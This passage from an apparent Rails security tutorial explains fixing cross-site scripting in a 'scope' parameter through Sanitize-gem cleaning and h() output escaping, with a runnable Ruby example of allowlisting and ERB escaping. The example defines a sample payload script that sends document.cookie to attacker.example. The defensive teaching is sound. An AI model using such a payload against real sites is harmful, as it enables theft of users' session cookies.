Solution and Fix:
Two fixes are needed for this: 1) a check on the incoming parameters and 2) escaping of the output values. Neither one alone is sufficient; the parameter check keeps script out of stored data, and output escaping makes sure that anything which slips past the check is still rendered as text rather than executed.
1) Checking the parameters (Refer: https://selvaonrails.wordpress.com/2012/04/03/ruby-on-rails-sanitize-4/)
The parameters have to be checked for malicious scripts, which can be done with the help of the 'Sanitize' gem. For example, an attacker can pass a script like the one below in the scope parameter.
If the above is executed successfully, the attacker steals the cookie from the web page (the script can send document.cookie to a server the attacker controls). To avoid this, the parameters need to be checked and any script in them stripped out before the value is stored or used. This can be achieved with the 'Sanitize' gem with code like the following.
Sanitize.clean("//value goes here//")
With the gem's default (empty) configuration this removes every HTML tag from the value and returns only the remaining text, so a <script> element in the parameter never reaches the page as markup. Note that this is removal, not escaping: the tags are dropped rather than converted to entities. Newer releases of the gem call this method Sanitize.fragment instead of Sanitize.clean.
2) Escaping on the output values
As a second step, it is good practice to escape all output of the application, especially when re-displaying user input that hasn't been input-filtered. Use escapeHTML() (or its alias h()) to replace the HTML characters &, ", <, > (and ') by their entity representations, so the browser shows them as text instead of interpreting them as markup. In Rails 3 and later, <%= %> escapes its output automatically and h() is only needed in Rails 2 views; in any version, a string marked with html_safe bypasses this escaping, so never mark user input as html_safe.
Ex:- <%= h @value_to_be_displayed %>
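The two steps together, as an added example that is not part of the original post and does not use the Sanitize gem: it relies only on Ruby's standard library (ERB::Util, which provides the same h()/html_escape used in Rails views) so it runs as-is. It assumes, for illustration, that the scope parameter only ever takes a few fixed values (all, mine, recent) and therefore checks it against an allowlist instead of stripping tags; the attacker.example payload is constructed for the example. Two tiny ERB templates stand in for a view, one without escaping and one with h(), so the difference in the rendered output can be seen directly.

```ruby
require 'erb'
include ERB::Util # makes h()/html_escape available, as in Rails views

# Constructed sample payload, not taken from the original post: a cookie
# stealing script an attacker could send in the "scope" parameter.
PAYLOAD = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'.freeze

# Step 1: check the parameter before the application uses it.
# Assumption for this example: "scope" only ever takes a few fixed values,
# so an allowlist is the tightest check; anything else falls back to a safe
# default. (The post uses Sanitize.clean to strip tags from free-text
# parameters; an allowlist is stricter when the legal values are known.)
ALLOWED_SCOPES = %w[all mine recent].freeze

def checked_scope(raw, default = 'all')
  value = raw.to_s.strip
  ALLOWED_SCOPES.include?(value) ? value : default
end

# Step 2: escape on output. ERB::Util.html_escape (alias h) turns
# & < > " ' into entity references, so the browser shows them as text
# instead of parsing them as markup.
def escaped(value)
  html_escape(value)
end

# Two one-line ERB templates standing in for a Rails 2-style view.
# The first forgets to escape (the vulnerable pattern); the second uses h().
def render_unsafe(scope)
  ERB.new('<p>Scope: <%= scope %></p>').result(binding)
end

def render_safe(scope)
  ERB.new('<p>Scope: <%= h scope %></p>').result(binding)
end

# Both layers together, as a controller action would apply them: the
# parameter is checked first, and whatever survives is still escaped on
# output, so a value that slips past the check cannot execute.
def scope_page(params)
  render_safe(checked_scope(params['scope']))
end

if __FILE__ == $PROGRAM_NAME
  puts render_unsafe(PAYLOAD)         # script tag reaches the browser intact
  puts render_safe(PAYLOAD)           # script tag rendered as inert text
  puts scope_page('scope' => PAYLOAD) # payload rejected, default scope rendered
  puts scope_page('scope' => 'mine')
end
```

Running the script prints the unsafe rendering with the <script> element intact, then the escaped rendering with &lt;script&gt; in its place, then the page for the rejected payload (which falls back to the default scope). The allowlist is the right check for a parameter with known legal values; for free-text fields, where stripping tags with the Sanitize gem is the option the post describes, the output escaping in render_safe is still the layer that must never be skipped.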
Links for References: